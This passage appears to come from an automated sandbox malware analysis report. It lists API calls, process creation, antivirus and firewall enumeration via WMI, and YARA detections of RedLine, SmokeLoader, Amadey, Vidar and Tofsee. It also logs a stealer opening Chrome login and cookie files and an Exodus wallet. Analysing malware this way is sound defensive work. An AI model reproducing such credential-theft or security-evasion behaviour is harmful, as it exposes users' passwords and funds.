                          Source: 25.0.7D0A.exe.d70000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 25.0.7D0A.exe.d70000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 25.0.7D0A.exe.d70000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 25.0.7D0A.exe.d70000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 25.0.7D0A.exe.d70000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 25.0.7D0A.exe.d70000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 37.0.7D0A.exe.650000.7.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 37.0.7D0A.exe.650000.7.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 37.0.7D0A.exe.650000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 37.0.7D0A.exe.650000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 37.0.7D0A.exe.650000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 37.0.7D0A.exe.650000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 37.0.7D0A.exe.650000.11.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 37.0.7D0A.exe.650000.11.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 37.0.7D0A.exe.650000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 37.0.7D0A.exe.650000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 37.0.7D0A.exe.400000.8.unpack, NativeHelper.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 37.0.7D0A.exe.650000.9.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 37.0.7D0A.exe.650000.9.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeProcess created: C:\Users\user\Desktop\eIxMVDoQF3.exe "C:\Users\user\Desktop\eIxMVDoQF3.exe"
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdProcess created: C:\Users\user\AppData\Roaming\rwjfsvd C:\Users\user\AppData\Roaming\rwjfsvd
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6800 -ip 6800
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6800 -s 520
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess created: C:\Users\user\AppData\Local\Temp\7D0A.exe C:\Users\user\AppData\Local\Temp\7D0A.exe
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeCode function: 24_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeCode function: 24_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,
                          Source: svchost.exe, 00000007.00000002.543418665.000001F46BC60000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.317357684.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.289030111.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.303596196.00000000011E0000.00000002.00020000.sdmp, F805.exe, 00000010.00000000.378018010.0000000000CD0000.00000002.00020000.sdmp, F805.exe, 00000010.00000000.378848152.0000000000CD0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                          Source: explorer.exe, 0000000A.00000000.316999610.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.302758560.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.288715554.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
                          Source: svchost.exe, 00000007.00000002.543418665.000001F46BC60000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.290854913.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.317357684.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.289030111.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.303596196.00000000011E0000.00000002.00020000.sdmp, F805.exe, 00000010.00000000.378018010.0000000000CD0000.00000002.00020000.sdmp, F805.exe, 00000010.00000000.378848152.0000000000CD0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                          Source: svchost.exe, 00000007.00000002.543418665.000001F46BC60000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.317357684.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.289030111.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.303596196.00000000011E0000.00000002.00020000.sdmp, F805.exe, 00000010.00000000.378018010.0000000000CD0000.00000002.00020000.sdmp, F805.exe, 00000010.00000000.378848152.0000000000CD0000.00000002.00020000.sdmpBinary or memory string: Progman
                          Source: svchost.exe, 00000007.00000002.543418665.000001F46BC60000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.317357684.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.289030111.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.303596196.00000000011E0000.00000002.00020000.sdmp, F805.exe, 00000010.00000000.378018010.0000000000CD0000.00000002.00020000.sdmp, F805.exe, 00000010.00000000.378848152.0000000000CD0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                          Source: explorer.exe, 0000000A.00000000.324373605.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.311087346.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.294310471.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: GetLocaleInfoA,
                          Source: C:\Users\user\AppData\Local\Temp\F805.exeCode function: GetLocaleInfoA,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7D0A.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7D0A.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 0_2_00419F67 __vswprintf,_putc,__wrename,_atexit,_malloc,_realloc,_ferror,GetBinaryTypeA,SetCurrentDirectoryA,Process32NextW,InitializeCriticalSection,QueryDosDeviceW,TerminateJobObject,GlobalAddAtomW,DeleteAtom,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointW,GetCompressedFileSizeA,GetNamedPipeInfo,lstrcpynA,GetProcessVersion,GetConsoleAliasesLengthW,UnregisterWait,GetProcessHandleCount,CancelWaitableTimer,SetFileApisToANSI,CreateIoCompletionPort,FindClose,SetEndOfFile,GetCommMask,LocalLock,OpenMutexW,GetLastError,HeapFree,WriteConsoleOutputCharacterA,GetModuleHandleW,GetNumberOfConsoleInputEvents,FreeEnvironmentStringsA,GetWriteWatch,GetConsoleAliasExesLengthW,_lopen,FileTimeToLocalFileTime,SetCommState,EnumDateFormatsA,TransactNamedPipe,WriteConsoleInputW,GetConsoleAliasExesLengthA,GetAtomNameW,FreeConsole,FlushConsoleInputBuffer,GetConsoleAliasA,SetConsoleCP,VerSetConditionMask,LockFile,SetSystemTime,SetThreadExecutionState,VerLanguageNameW,lstrcpyA,SetFileShortNameW,GetOverlappedResult,GetPrivateProfileSectionW,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,EnumTimeFormatsW,FindResourceExW,GetPrivateProfileSectionNamesW,GetOverlappedResult,WaitNamedPipeA,TransmitCommChar,CreateSemaphoreW,GetBinaryTypeW,PeekConsoleInputA,BuildCommDCBA,UnregisterWaitEx,GlobalLock,GetOverlappedResult,GetProcAddress,MoveFileExW,GetThreadContext,ResetEvent,FindActCtxSectionStringA,_memset,SetDefaultCommConfigW,lstrcmpW,HeapUnlock,GetConsoleMode,GetVolumePathNameA,MoveFileW,Process32NextW,GetFileAttributesExA,GetDriveTypeA,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionA,GetPrivateProfileSectionW,GetSystemTimeAdjustment,WriteConsoleW,EndUpdateResourceW,FindVolumeMountPointClose,DefineDosDeviceW,InterlockedExchange,SetMailslotInfo,GetTapeParameters,CreateActCtxW,FindCloseChangeNotification,GlobalFindAtomA,TerminateProcess,GetSystemWindowsDirectoryW,GetVersion,SetConsoleMode,WriteFile,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,DeleteVolumeMountPointA,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_0040AD40 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_0040ACA0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeCode function: 24_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 0_2_00419F67 __vswprintf,_putc,__wrename,_atexit,_malloc,_realloc,_ferror,GetBinaryTypeA,SetCurrentDirectoryA,Process32NextW,InitializeCriticalSection,QueryDosDeviceW,TerminateJobObject,GlobalAddAtomW,DeleteAtom,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointW,GetCompressedFileSizeA,GetNamedPipeInfo,lstrcpynA,GetProcessVersion,GetConsoleAliasesLengthW,UnregisterWait,GetProcessHandleCount,CancelWaitableTimer,SetFileApisToANSI,CreateIoCompletionPort,FindClose,SetEndOfFile,GetCommMask,LocalLock,OpenMutexW,GetLastError,HeapFree,WriteConsoleOutputCharacterA,GetModuleHandleW,GetNumberOfConsoleInputEvents,FreeEnvironmentStringsA,GetWriteWatch,GetConsoleAliasExesLengthW,_lopen,FileTimeToLocalFileTime,SetCommState,EnumDateFormatsA,TransactNamedPipe,WriteConsoleInputW,GetConsoleAliasExesLengthA,GetAtomNameW,FreeConsole,FlushConsoleInputBuffer,GetConsoleAliasA,SetConsoleCP,VerSetConditionMask,LockFile,SetSystemTime,SetThreadExecutionState,VerLanguageNameW,lstrcpyA,SetFileShortNameW,GetOverlappedResult,GetPrivateProfileSectionW,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,EnumTimeFormatsW,FindResourceExW,GetPrivateProfileSectionNamesW,GetOverlappedResult,WaitNamedPipeA,TransmitCommChar,CreateSemaphoreW,GetBinaryTypeW,PeekConsoleInputA,BuildCommDCBA,UnregisterWaitEx,GlobalLock,GetOverlappedResult,GetProcAddress,MoveFileExW,GetThreadContext,ResetEvent,FindActCtxSectionStringA,_memset,SetDefaultCommConfigW,lstrcmpW,HeapUnlock,GetConsoleMode,GetVolumePathNameA,MoveFileW,Process32NextW,GetFileAttributesExA,GetDriveTypeA,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionA,GetPrivateProfileSectionW,GetSystemTimeAdjustment,WriteConsoleW,EndUpdateResourceW,FindVolumeMountPointClose,DefineDosDeviceW,InterlockedExchange,SetMailslotInfo,GetTapeParameters,CreateActCtxW,FindCloseChangeNotification,GlobalFindAtomA,TerminateProcess,GetSystemWindowsDirectoryW,GetVersion,SetConsoleMode,WriteFile,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,DeleteVolumeMountPointA,

                          Lowering of HIPS / PFW / Operating System Security Settings:

                          barindex
                          Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                          Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                          Source: svchost.exe, 00000009.00000002.541217017.000001B6FC82A000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.541955410.000001B6FC902000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.540987620.000001B6FC813000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: svchost.exe, 00000009.00000002.541495855.000001B6FC840000.00000004.00000001.sdmpBinary or memory string: @\REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe

                          Stealing of Sensitive Information:

                          barindex
                          Yara detected RedLine StealerShow sources
                          Source: Yara matchFile source: 25.2.7D0A.exe.447f910.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 25.2.7D0A.exe.447f910.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 37.0.7D0A.exe.400000.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 37.0.7D0A.exe.400000.10.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 37.0.7D0A.exe.400000.12.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 37.0.7D0A.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 37.0.7D0A.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 37.2.7D0A.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000025.00000000.429672404.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000025.00000000.428360740.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000025.00000000.429057949.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000025.00000002.520312697.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000019.00000002.437060463.0000000004361000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000025.00000000.427833642.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Yara detected SmokeLoaderShow sources
                          Source: Yara matchFile source: 15.2.rwjfsvd.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.1.eIxMVDoQF3.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.eIxMVDoQF3.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.0.rwjfsvd.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.0.rwjfsvd.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.2.rwjfsvd.5715a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.0.rwjfsvd.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.eIxMVDoQF3.exe.6515a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.1.rwjfsvd.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000F.00000002.382566740.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000F.00000002.382707049.00000000004D1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.332260069.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.332377268.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000000.318144404.0000000002E21000.00000020.00020000.sdmp, type: MEMORY
                          Yara detected Amadey botShow sources
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Yara detected Vidar stealerShow sources
                          Source: Yara matchFile source: 00000017.00000002.388045141.0000000000763000.00000004.00000001.sdmp, type: MEMORY
                          Yara detected TofseeShow sources
                          Source: Yara matchFile source: 24.2.743F.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.743F.exe.570e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.743F.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.3.743F.exe.590000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000018.00000002.432619186.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000002.432841929.0000000000570000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000003.392346980.0000000000590000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 743F.exe PID: 6640, type: MEMORYSTR
                          Tries to harvest and steal browser information (history, passwords, etc)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Tries to steal Crypto Currency WalletsShow sources
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                          Source: Yara matchFile source: 00000017.00000002.388045141.0000000000763000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 7D0A.exe PID: 2008, type: MEMORYSTR

                          Remote Access Functionality:

                          barindex
                          Yara detected RedLine StealerShow sources
                          Source: Yara matchFile source: 25.2.7D0A.exe.447f910.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 25.2.7D0A.exe.447f910.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 37.0.7D0A.exe.400000.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 37.0.7D0A.exe.400000.10.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 37.0.7D0A.exe.400000.12.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 37.0.7D0A.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 37.0.7D0A.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 37.2.7D0A.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000025.00000000.429672404.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000025.00000000.428360740.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000025.00000000.429057949.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000025.00000002.520312697.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000019.00000002.437060463.0000000004361000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000025.00000000.427833642.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Yara detected SmokeLoaderShow sources
                          Source: Yara matchFile source: 15.2.rwjfsvd.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.1.eIxMVDoQF3.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.eIxMVDoQF3.exe.400000.0.unpack, type: UNPACKEDPE
